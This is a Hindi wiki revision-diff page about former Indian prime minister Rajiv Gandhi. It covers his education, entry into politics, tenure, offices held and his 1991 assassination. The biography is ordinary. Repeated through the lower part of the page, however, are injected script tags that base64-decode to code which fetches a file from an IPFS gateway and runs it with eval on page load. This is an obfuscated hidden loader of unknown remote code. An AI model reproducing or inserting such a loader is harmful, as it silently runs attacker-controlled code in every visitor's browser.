Difference between revisions of "राजीव गाँधी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 22: Line 22:
 
|विद्यालय=दून स्कूल देहरादून, इंपीरियल कॉलेज लंदन
 
|विद्यालय=दून स्कूल देहरादून, इंपीरियल कॉलेज लंदन
 
|शिक्षा=इंजीनियरिंग
 
|शिक्षा=इंजीनियरिंग
|पुरस्कार-उपाधि=[[भारत रत्न]] सम्मान
+
|पुरस्कार-उपाधि=[[भारत रत्न]]  
 
|विशेष योगदान=जवाहर रोज़गार योजना
 
|विशेष योगदान=जवाहर रोज़गार योजना
 
|संबंधित लेख=
 
|संबंधित लेख=
Line 33: Line 33:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''राजीव गाँधी''' ([[अंग्रेज़ी]]:''Rajiv Gandhi'') का पूरा नाम '''राजीव रत्न गांधी''' था। इनका जन्म [[20 अगस्त]], [[1944]] को बंबई (वर्तमान [[मुंबई]]), [[भारत]] में हुआ था। राजीव गाँधी [[जवाहर लाल नेहरू]] के प्रपौत्र और [[फ़िरोज गाँधी]] [[भारत]] की प्रथम महिला प्रधानमंत्री [[इन्दिरा गाँधी]] के पुत्र थे। राजीव गांधी [[भारत]] की कांग्रेस (इ) पार्टी के अग्रणी महासचिव (1981 से) थे, और अपनी माँ की हत्या के बाद [[भारत]] के प्रधानमंत्री ([[1984]]-[[1989]]) बने। राजीव गाँधी का विवाह [[सोनिया गाँधी]] के साथ हुआ था। राजीव गाँधी के दो सन्तानें है, पुत्र [[राहुल गाँधी]] और पुत्री [[प्रियंका गाँधी]]।
+
'''राजीव गाँधी''' ([[अंग्रेज़ी]]:''Rajiv Gandhi'', जन्म: [[20 अगस्त]], [[1944]] - मृत्यु: [[21 मई]], [[1991]]) [[भारत]] की पहली महिला प्रधानमंत्री [[इन्दिरा गांधी]] के पुत्र और भारत के पहले प्रधानमंत्री [[जवाहरलाल नेहरू]] के पौत्र और [[भारत के प्रधानमंत्री|भारत के नौवें प्रधानमंत्री]] थे। इनका पूरा नाम '''राजीव रत्न गांधी''' था। राजीव गांधी [[भारत]] की कांग्रेस (इ) पार्टी के अग्रणी महासचिव (1981 से) थे और अपनी माँ की हत्या के बाद [[भारत]] के प्रधानमंत्री ([[1984]]-[[1989]]) बने। 40 साल की उम्र में देश के सबसे युवा और नौवें प्रधानमंत्री होने का गौरव हासिल करने वाले राजीव गांधी आधुनिक भारत के शिल्पकार कहे जा सकते हैं। यह पहले ऐसे व्यक्ति थे जिन्होंने देश में तकनीक के प्रयोग को प्राथमिकता देकर कंप्यूटर के व्यापक प्रयोग पर जोर डाला। भारत में कंप्यूटर को स्थापित करने के लिए उन्हें कई विरोधों और आरोपों को भी झेलना पड़ा, लेकिन अब वह देश की ताकत बन चुके कंप्यूटर क्रांति के जनक के रूप में भी जाने जाते हैं। राजीव गांधी देश के युवाओं में काफी लोकप्रिय नेता थे। उनका भाषण सुनने के लिए लोग काफी इंतजार भी करते थे। राजीव देश के सबसे युवा प्रधानमंत्री थे। उन्‍होंने अपने प्रधानमंत्रित्‍व काल में कई ऐसे फैसले लिए जिसका असर देश के विकास पर देखने को मिला।
==शिक्षा==
+
==जीवन परिचय==
राजीव तथा उनके छोटे भाई [[संजय गाँधी]] ([[1946]]-[[1980]]) की शिक्षा-दीक्षा [[देहरादून]] के प्रतिष्ठित दून स्कूल में हुई थी। इसके बाद राजीव गांधी ने [[लंदन]] के इंपीरियल कॉलेज में दाख़िला लिया तथा केंब्रिज विश्वविद्यालय ([[1965]]) से इंजीनियरिंग पाठ्यक्रम पूरा किया, [[भारत]] लौटने पर उन्होंने व्यावसायिक पायलट का लाइसेंस प्राप्त किया और [[1968]] से इंडियन एयरलाइन्स में काम करने लगे।  
+
[[चित्र:Rajiv-Gandhi-And-Sonia-Gandhi.jpg|thumb|250px|left|[[सोनिया गाँधी]] एवं राजीव गाँधी]]
[[चित्र:Rajiv-Gandhi-And-Sonia-Gandhi.jpg|thumb|250px|left|[[सोनिया गाँधी]] एवं राजीव गाँधी <br />Rajiv Gandhi And Sonia Gandhi]]
+
राजीव गाँधी का जन्म [[20 अगस्त]], [[1944]] को बंबई (वर्तमान [[मुंबई]]), [[भारत]] में हुआ था। कैम्ब्रिज में पढ़ाई के दौरान राजीव गांधी की मुलाकात एंटोनिया मैनो से हुई, विवाहोपरांत जिनका नाम बदलकर [[सोनिया गांधी]] रखा गया। राजीव गाँधी के दो सन्तानें है, पुत्र [[राहुल गाँधी]] और पुत्री [[प्रियंका गाँधी]]। राजीव तथा उनके छोटे भाई [[संजय गाँधी]] ([[1946]]-[[1980]]) की शिक्षा-दीक्षा [[देहरादून]] के प्रतिष्ठित दून स्कूल में हुई थी। इसके बाद राजीव गांधी ने [[लंदन]] के इंपीरियल कॉलेज में दाख़िला लिया तथा केंब्रिज विश्वविद्यालय ([[1965]]) से इंजीनियरिंग पाठ्यक्रम पूरा किया, [[भारत]] लौटने पर उन्होंने व्यावसायिक पायलट का लाइसेंस प्राप्त किया और [[1968]] से इंडियन एयरलाइन्स में काम करने लगे।
==कार्यकारिणी सदस्य==
+
==राजनैतिक सफ़र==
जब तक उनके भाई जीवित थे, राजीव राजनीति से बाहर ही रहे, लेकिन एक शक्तिशाली राजनीति व्यक्तित्व के धनी संजय की [[23 जून]], 1980 को एक वायुयान दुर्घटना में मृत्यु हो जाने के बाद तत्कालीन प्रधानमंत्री इंदिरा गांधी राजीव को राजनीतिक जीवन में ले आईं। जून [[1981]] में वह [[लोकसभा]] उपचुनाव में निर्वाचित हुए और इसी महीने युवा कांग्रेस की राष्ट्रीय कार्यकारिणी के सदस्य बन गए।
+
जब तक उनके भाई जीवित थे, राजीव राजनीति से बाहर ही रहे, लेकिन एक शक्तिशाली राजनीति व्यक्तित्व के धनी संजय की [[23 जून]], [[1980]] को एक वायुयान दुर्घटना में मृत्यु हो जाने के बाद तत्कालीन प्रधानमंत्री इंदिरा गांधी राजीव को राजनीतिक जीवन में ले आईं। [[जून]] [[1981]] में वह [[लोकसभा]] उपचुनाव में निर्वाचित हुए और इसी महीने युवा कांग्रेस की राष्ट्रीय कार्यकारिणी के सदस्य बन गए। राजनीतिक पृष्ठभूमि होने के बावजूद राजीव गांधी ने कभी भी राजनीति में रुचि नहीं ली। भारतीय राजनीति और शासन व्यवस्था में राजीव गांधी का प्रवेश केवल हालातों की ही देन था। [[दिसंबर]] [[1984]] के चुनावों में [[कांग्रेस]] को जबरदस्त बहुमत हासिल हुआ। इस जीत का नेतृत्व भी राजीव गांधी ने ही किया था। अपने शासनकाल में उन्होंने प्रशासनिक सेवाओं और नौकरशाही में सुधार लाने के लिए कई कदम उठाए। [[कश्मीर]] और [[पंजाब]] में चल रहे अलगाववादी आंदोलनकारियों को हतोत्साहित करने के लिए राजीव गांधी ने कड़े प्रयत्‍‌न किए। [[भारत]] में ग़रीबी के स्तर में कमी लाने और ग़रीबों की आर्थिक दशा सुधारने के लिए [[1 अप्रैल]] [[1989]] को राजीव गांधी ने जवाहर रोजगार गारंटी योजना को लागू किया जिसके अंतर्गत इंदिरा आवास योजना और दस लाख कुआं योजना जैसे कई कार्यक्रमों की शुरुआत की।<ref>{{cite web |url=http://hindi.yahoo.com/%E0%A4%B0%E0%A4%BE%E0%A4%9C%E0%A5%80%E0%A4%B5-%E0%A4%97%E0%A4%BE%E0%A4%82%E0%A4%A7%E0%A5%80-%E0%A4%95%E0%A4%BE-%E0%A4%9C%E0%A4%A8%E0%A5%8D%E0%A4%AE%E0%A4%A6%E0%A4%BF%E0%A4%A8-%E0%A4%86%E0%A4%9C-%E0%A4%AF%E0%A4%B9%E0%A4%BE%E0%A4%82-%E0%A4%AA%E0%A4%A2%E0%A4%BC%E0%A5%87%E0%A4%82-%E0%A4%89%E0%A4%A8%E0%A4%95%E0%A5%87-034247638.html |title=कंप्यूटर क्रांति के अगुवा व कद्दावर नेता राजीव गांधी |accessmonthday=20 अगस्त |accessyear=2013 |last= |first= |authorlink= |format= |publisher=जागरण याहू इंडिया |language=हिंदी }}</ref>
 
==प्रधानमंत्री के रूप में==
 
==प्रधानमंत्री के रूप में==
राजीव को सौम्य व्यक्ति माना जाता था। जो पार्टी के अन्य नेताओं से विचार-विमर्श करते थे और जल्दबाज़ी में निर्णय नहीं लेते थे। जब [[31 अक्टूबर]] 1984 को उनकी माँ की हत्या हुई, तो राजीव को उसी दिन प्रधानमंत्री पद की शपथ दिलाई गई और उन्हें कुछ दिन बाद कांग्रेस (इं) पार्टी का नेता चुन लिया गया।  
+
राजीव को सौम्य व्यक्ति माना जाता था। जो पार्टी के अन्य नेताओं से विचार-विमर्श करते थे और जल्दबाज़ी में निर्णय नहीं लेते थे। जब [[31 अक्टूबर]] [[1984]] को उनकी माँ की हत्या हुई, तो राजीव को उसी दिन प्रधानमंत्री पद की शपथ दिलाई गई और उन्हें कुछ दिन बाद कांग्रेस (इं) पार्टी का नेता चुन लिया गया। उनका शासनकाल कई आरोपों से भी घिरा रहा जिसमें बोफोर्स घोटाला सबसे गंभीर था। इसके अलावा उन पर कोई ऐसा दाग नहीं था जिसकी वजह से उनकी निंदा हो। पाक दामन होने की वजह से ही लोगों के बीच राजीव गांधी की अच्छी पकड़ थी। [[श्रीलंका]] में चल रहे लिट्टे और सिंघलियों के बीच युद्ध को शांत करने के लिए राजीव गांधी ने [[भारतीय सेना]] को श्रीलंका में तैनात कर दिया। जिसका प्रतिकार लिट्टे ने [[तमिलनाडु]] में चुनावी प्रचार के दौरान राजीव गांधी पर आत्मघाती हमला करवा कर लिया। 21 मई, 1991 को सुबह 10 बजे के करीब एक महिला राजीव गांधी से मिलने के लिए स्टेज तक गई और उनके पांव छूने के लिए जैसे ही झुकी उसके शरीर में लगा आरडीएक्स फट गया। इस हमले में राजीव गांधी की मौत हो गई। देश में राजीव गांधी की मौत के बाद बहुत बड़ा रोष देखने को मिला।
 
==अलगाववादी आन्दोलन==
 
==अलगाववादी आन्दोलन==
दिसम्बर 1984 के आम चुनाव में उन्होंने पार्टी की ज़बरदस्त जीत का नेतृत्व किया और उनके प्रशासन ने सरकारी नौकरशाही में सुधार लाने तथा देश की अर्थव्यवस्था के उदारीकरण के लिए ज़ोरदार क़दम उठाए। लेकिन [[पंजाब]] और [[कश्मीर]] में अलगाववादी आन्दोलन को हतोत्साहित करने की राजीव की कोशिश का उल्टा असर हुआ तथा कई वित्तीय साज़िशों में उनकी सरकार के उलझने के बाद उनका नेतृत्व लगातार अप्रभावी होता गया। 1989 में उन्होंने प्रधानमंत्री पद से इस्तीफ़ा दे दिया, लेकिन वह कांग्रेस (इं) पार्टी के नेता पद पर बने रहे। आगामी संसदीय चुनाव के लिए [[तमिलनाडु]] में चुनाव प्रचार के दौरान एक आत्मघाती महिला के बम विस्फोट में उनकी मृत्यु हो गई। कहा जाता है कि यह महिला तमिल अलगाववादियों से संबद्ध थी।  
+
[[दिसम्बर]] [[1984]] के आम चुनाव में उन्होंने पार्टी की ज़बरदस्त जीत का नेतृत्व किया और उनके प्रशासन ने सरकारी नौकरशाही में सुधार लाने तथा देश की अर्थव्यवस्था के उदारीकरण के लिए ज़ोरदार क़दम उठाए। लेकिन [[पंजाब]] और [[कश्मीर]] में अलगाववादी आन्दोलन को हतोत्साहित करने की राजीव की कोशिश का उल्टा असर हुआ तथा कई वित्तीय साज़िशों में उनकी सरकार के उलझने के बाद उनका नेतृत्व लगातार अप्रभावी होता गया। 1989 में उन्होंने प्रधानमंत्री पद से इस्तीफ़ा दे दिया, लेकिन वह कांग्रेस (इं) पार्टी के नेता पद पर बने रहे। आगामी संसदीय चुनाव के लिए [[तमिलनाडु]] में चुनाव प्रचार के दौरान एक आत्मघाती महिला के बम विस्फोट में उनकी मृत्यु हो गई। कहा जाता है कि यह महिला तमिल अलगाववादियों से संबद्ध थी।  
  
 
==राजनीतिक सफ़र और पद ==
 
==राजनीतिक सफ़र और पद ==
Line 107: Line 107:
  
 
{{शासन क्रम |शीर्षक=[[भारत के प्रधानमंत्री]] |पूर्वाधिकारी=[[चौधरी चरण सिंह]] |उत्तराधिकारी=[[विश्वनाथ प्रताप सिंह]]}}
 
{{शासन क्रम |शीर्षक=[[भारत के प्रधानमंत्री]] |पूर्वाधिकारी=[[चौधरी चरण सिंह]] |उत्तराधिकारी=[[विश्वनाथ प्रताप सिंह]]}}
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==

Revision as of 12:26, 20 August 2013

rajiv gaandhi
poora nam rajiv ratn gaandhi
janm 20 agast, 1944
janm bhoomi muanbee, maharashtr
mrityu 21 mee 1991
mrityu sthan shriperuanbudoor, tamilanadu
mrityu karan hatya
pati/patni soniya gaandhi
santan rahul gaandhi, priyanka gaandhi
nagarikata bharatiy
parti kaangres
pad bharat ke nauvean pradhanamantri
kary kal 31 aktoobar 19842 disambar 1989
shiksha ianjiniyariang
vidyalay doon skool deharadoon, ianpiriyal k aaulej landan
bhasha hindi, aangrezi
puraskar-upadhi bharat ratn
vishesh yogadan javahar rozagar yojana

rajiv gaandhi (aangrezi:Rajiv Gandhi, janm: 20 agast, 1944 - mrityu: 21 mee, 1991) bharat ki pahali mahila pradhanamantri indira gaandhi ke putr aur bharat ke pahale pradhanamantri javaharalal neharoo ke pautr aur bharat ke nauvean pradhanamantri the. inaka poora nam rajiv ratn gaandhi tha. rajiv gaandhi bharat ki kaangres (i) parti ke agrani mahasachiv (1981 se) the aur apani maan ki hatya ke bad bharat ke pradhanamantri (1984-1989) bane. 40 sal ki umr mean desh ke sabase yuva aur nauvean pradhanamantri hone ka gaurav hasil karane vale rajiv gaandhi adhunik bharat ke shilpakar kahe ja sakate haian. yah pahale aise vyakti the jinhoanne desh mean takanik ke prayog ko prathamikata dekar kanpyootar ke vyapak prayog par jor dala. bharat mean kanpyootar ko sthapit karane ke lie unhean kee virodhoan aur aropoan ko bhi jhelana p da, lekin ab vah desh ki takat ban chuke kanpyootar kraanti ke janak ke roop mean bhi jane jate haian. rajiv gaandhi desh ke yuvaoan mean kaphi lokapriy neta the. unaka bhashan sunane ke lie log kaphi iantajar bhi karate the. rajiv desh ke sabase yuva pradhanamantri the. unh‍hoanne apane pradhanamantrith‍v kal mean kee aise phaisale lie jisaka asar desh ke vikas par dekhane ko mila.

jivan parichay

[[chitr:Rajiv-Gandhi-And-Sonia-Gandhi.jpg|thumb|250px|left|soniya gaandhi evan rajiv gaandhi]] rajiv gaandhi ka janm 20 agast, 1944 ko banbee (vartaman muanbee), bharat mean hua tha. kaimbrij mean padhaee ke dauran rajiv gaandhi ki mulakat eantoniya maino se huee, vivahoparaant jinaka nam badalakar soniya gaandhi rakha gaya. rajiv gaandhi ke do santanean hai, putr rahul gaandhi aur putri priyanka gaandhi. rajiv tatha unake chhote bhaee sanjay gaandhi (1946-1980) ki shiksha-diksha deharadoon ke pratishthit doon skool mean huee thi. isake bad rajiv gaandhi ne landan ke ianpiriyal k aaulej mean dakhila liya tatha keanbrij vishvavidyalay (1965) se ianjiniyariang pathyakram poora kiya, bharat lautane par unhoanne vyavasayik payalat ka laiseans prapt kiya aur 1968 se iandiyan eyaralains mean kam karane lage.

rajanaitik safar

jab tak unake bhaee jivit the, rajiv rajaniti se bahar hi rahe, lekin ek shaktishali rajaniti vyaktitv ke dhani sanjay ki 23 joon, 1980 ko ek vayuyan durghatana mean mrityu ho jane ke bad tatkalin pradhanamantri iandira gaandhi rajiv ko rajanitik jivan mean le aeean. joon 1981 mean vah lokasabha upachunav mean nirvachit hue aur isi mahine yuva kaangres ki rashtriy karyakarini ke sadasy ban ge. rajanitik prishthabhoomi hone ke bavajood rajiv gaandhi ne kabhi bhi rajaniti mean ruchi nahian li. bharatiy rajaniti aur shasan vyavastha mean rajiv gaandhi ka pravesh keval halatoan ki hi den tha. disanbar 1984 ke chunavoan mean kaangres ko jabaradast bahumat hasil hua. is jit ka netritv bhi rajiv gaandhi ne hi kiya tha. apane shasanakal mean unhoanne prashasanik sevaoan aur naukarashahi mean sudhar lane ke lie kee kadam uthae. kashmir aur panjab mean chal rahe alagavavadi aandolanakariyoan ko hatotsahit karane ke lie rajiv gaandhi ne k de prayath‍‌n kie. bharat mean garibi ke star mean kami lane aur gariboan ki arthik dasha sudharane ke lie 1 aprail 1989 ko rajiv gaandhi ne javahar rojagar garanti yojana ko lagoo kiya jisake aantargat iandira avas yojana aur das lakh kuaan yojana jaise kee karyakramoan ki shuruat ki.[1]

pradhanamantri ke roop mean

rajiv ko saumy vyakti mana jata tha. jo parti ke any netaoan se vichar-vimarsh karate the aur jaldabazi mean nirnay nahian lete the. jab 31 aktoobar 1984 ko unaki maan ki hatya huee, to rajiv ko usi din pradhanamantri pad ki shapath dilaee gee aur unhean kuchh din bad kaangres (ian) parti ka neta chun liya gaya. unaka shasanakal kee aropoan se bhi ghira raha jisamean bophors ghotala sabase ganbhir tha. isake alava un par koee aisa dag nahian tha jisaki vajah se unaki nianda ho. pak daman hone ki vajah se hi logoan ke bich rajiv gaandhi ki achchhi pak d thi. shrilanka mean chal rahe litte aur sianghaliyoan ke bich yuddh ko shaant karane ke lie rajiv gaandhi ne bharatiy sena ko shrilanka mean tainat kar diya. jisaka pratikar litte ne tamilanadu mean chunavi prachar ke dauran rajiv gaandhi par atmaghati hamala karava kar liya. 21 mee, 1991 ko subah 10 baje ke karib ek mahila rajiv gaandhi se milane ke lie stej tak gee aur unake paanv chhoone ke lie jaise hi jhuki usake sharir mean laga aradieks phat gaya. is hamale mean rajiv gaandhi ki maut ho gee. desh mean rajiv gaandhi ki maut ke bad bahut b da rosh dekhane ko mila.

alagavavadi andolan

disambar 1984 ke am chunav mean unhoanne parti ki zabaradast jit ka netritv kiya aur unake prashasan ne sarakari naukarashahi mean sudhar lane tatha desh ki arthavyavastha ke udarikaran ke lie zoradar qadam uthae. lekin panjab aur kashmir mean alagavavadi andolan ko hatotsahit karane ki rajiv ki koshish ka ulta asar hua tatha kee vittiy sazishoan mean unaki sarakar ke ulajhane ke bad unaka netritv lagatar aprabhavi hota gaya. 1989 mean unhoanne pradhanamantri pad se istifa de diya, lekin vah kaangres (ian) parti ke neta pad par bane rahe. agami sansadiy chunav ke lie tamilanadu mean chunav prachar ke dauran ek atmaghati mahila ke bam visphot mean unaki mrityu ho gee. kaha jata hai ki yah mahila tamil alagavavadiyoan se sanbaddh thi.

rajanitik safar aur pad

dinaank / varsh pad
1981 lokasabha (satavian) ke lie nirvachit
1984 lokasabha (athavian) ke lie pun: nirvachit
19 aktoobar, 1984 se 2 disambar, 1984 tak pradhanamantri evan any sabhi mantralay vibhag jo ki any kisi mantri ko aanvatit kie ge.
31 disambar, 1984 se 14 janavari, 1985 vanijy aur apoorti, videsh, udyog v kampani mamale, vijnan v praudyogiki, paramanu oorja, aantariksh, ilaiktraniks, mahasagar,

vikas, karmik evan prashasanik sudhar, yuva mamale evan khel, sanskriti, paryatan evan nagar vimanan mantralay ka bhi padabhar sambhala.

31 disambar, 1984 se 20 aktoobar, 1986 paryavaran evan van mantralay ke bhi prabhari.
25 disambar, 1985 se 24 janavari, 1987 raksha mantralay ke bhi prabhari.
4 joon, 1986 se 24 joon, 1986 parivahan mantralay ke bhi prabhari.
24 janavari, 1987 se 25 julaee, 1987 vitt mantralay ke bhi prabhari.
4 mee, 1987 se 25 julaee, 1987 karyakram karyanvayan mantralay ke bhi prabhari.
15 julaee, 1987 se 28 julaee, 1987 paryatan mantralay ke bhi prabhari.
25 julaee, 1987 se 26 joon, 1988 videsh mantralay ka bhi karyabhar sambhala.
22 agast, 1987 se 10 navambar, 1987 jal sansadhan mantralay ka karyabhar bhi sambhala.
mee, 1989 se julaee, 1989 sanchar mantralay ka bhi karyabhar sambhala.
1989 lok sabha (nauvian) ke lie tisari bar nirvachit.
18 disambar, 1989 se 24 disambar, 1990 lok sabha (nauvian) mean vipaksh ke neta.
24 janavari, 1990 sadasy, samany prayojan samiti.
1991 lok sabha (dasavian) ke lie chauthi bar nirvachit.

nidhan

21 mee, 1991 shriperuanbudoor, tamilanadu mean inaki hatya kar di gee.



bharat ke pradhanamantri
65px|link=| poorvadhikari
chaudhari charan sianh
rajiv gaandhi uttaradhikari
vishvanath pratap sianh
65px|link=|

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


  1. kanpyootar kraanti ke aguva v kaddavar neta rajiv gaandhi (hiandi) jagaran yahoo iandiya. abhigaman tithi: 20 agast, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>